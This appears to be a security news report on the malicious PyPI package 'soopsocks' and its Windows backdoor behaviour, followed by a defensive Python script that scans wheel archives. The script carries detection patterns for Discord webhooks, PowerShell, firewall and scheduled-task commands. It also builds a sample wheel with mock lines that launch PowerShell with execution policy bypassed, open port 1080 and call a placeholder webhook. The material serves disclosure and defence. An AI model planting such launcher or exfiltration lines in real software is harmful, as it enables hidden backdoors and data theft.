
JFrog said in an analysis: "The executable ("_AUTORUN.EXE") is a compiled Go file that, besides including a SOCKS5 implementation as advertised, is also designed to run PowerShell scripts, set firewall rules, and relaunch itself with elevated permissions. It also carries out basic system and network reconnaissance, including Internet Explorer security settings and Windows installation date, and exfiltrates the information to a hard-coded Discord webhook."

"'_AUTORUN.VBS,' the Visual Basic Script launched by the Python package in versions 0.2.5 and 0.2.6, is also capable of running a PowerShell script, which then downloads a ZIP file containing the legitimate Python binary from an external domain ("install.soop[.]space:6969") and generates a batch script that's configured to install the package using the "pip install" command and run it. The PowerShell script then invokes the batch script, causing the Python package to be executed, which, in turn, elevates itself to run with administrative privileges."
soopsocks was uploaded to PyPI by user "soodalpie" on September 26, 2025, and accumulated 2,653 downloads before removal. The package advertised SOCKS5 proxy functionality while embedding backdoor-like behavior and automated installation mechanisms targeting Windows. The compiled Go executable "_AUTORUN.EXE" implemented SOCKS5, executed PowerShell scripts, set firewall rules, relaunched itself with elevated permissions, performed system and network reconnaissance (including Internet Explorer security settings and the Windows install date), and exfiltrated the collected data to a hard-coded Discord webhook. The Visual Basic script "_AUTORUN.VBS" and its PowerShell payload downloaded a ZIP containing a legitimate Python binary, generated a batch script to pip-install and run the package, elevated privileges, configured firewall rules for port 1080, installed the package as a service, maintained communication with Discord, and created scheduled-task persistence.
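A pre-install check a defender can run against a downloaded PyPI archive, looking for the artefacts this report describes: bundled executables and VBS/PowerShell launchers, hard-coded Discord webhook URLs, and firewall or scheduled-task commands. This is an added example, not JFrog's tooling or any code from the package; the sample wheel it builds is constructed here to mimic the soopsocks layout, with a placeholder webhook URL.

```python
import io
import re
import zipfile
from pathlib import PurePosixPath

# File types a pure-Python SOCKS5 library has no reason to ship.
SUSPICIOUS_EXT = {".exe", ".vbs", ".ps1", ".bat", ".cmd", ".dll"}
# Content indicators drawn from the behaviour described in the report.
PATTERNS = {
    "discord_webhook": re.compile(rb"https://discord(?:app)?\.com/api/webhooks/\S+"),
    "powershell_launch": re.compile(rb"powershell(?:\.exe)?\s+-", re.IGNORECASE),
    "firewall_rule": re.compile(rb"netsh\s+advfirewall|New-NetFirewallRule", re.IGNORECASE),
    "scheduled_task": re.compile(rb"schtasks|Register-ScheduledTask", re.IGNORECASE),
}

def scan_archive(data: bytes) -> list[tuple[str, str]]:
    """Return (member, finding) pairs for suspicious members or content matches."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = PurePosixPath(name).suffix.lower()
            if ext in SUSPICIOUS_EXT:
                findings.append((name, f"bundled {ext} file"))
            if info.file_size > 2_000_000:
                continue  # large binaries: the extension check above already covers them
            content = zf.read(name)
            for label, pattern in PATTERNS.items():
                if pattern.search(content):
                    findings.append((name, label))
    return findings

def build_sample_wheel() -> bytes:
    """Constructed sample wheel mimicking the reported layout (hypothetical contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("soopsocks/__init__.py", "def proxy(): ...\n")
        zf.writestr("soopsocks/_AUTORUN.EXE", b"MZ\x90\x00" + b"\x00" * 64)
        zf.writestr("soopsocks/_AUTORUN.VBS",
                    b'Set sh = CreateObject("WScript.Shell")\r\n'
                    b'sh.Run "powershell -ExecutionPolicy Bypass -File stage.ps1", 0\r\n')
        zf.writestr("soopsocks/stage.ps1",
                    b"New-NetFirewallRule -LocalPort 1080 -Action Allow\r\n"
                    b"Invoke-RestMethod -Uri https://discord.com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN\r\n")
    return buf.getvalue()

if __name__ == "__main__":
    for member, finding in scan_archive(build_sample_wheel()):
        print(f"{member}: {finding}")
```

Point it at a real wheel with `scan_archive(open(path, "rb").read())`; any hit on a package that claims to be pure Python is grounds to quarantine it rather than install it.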
Read at The Hacker News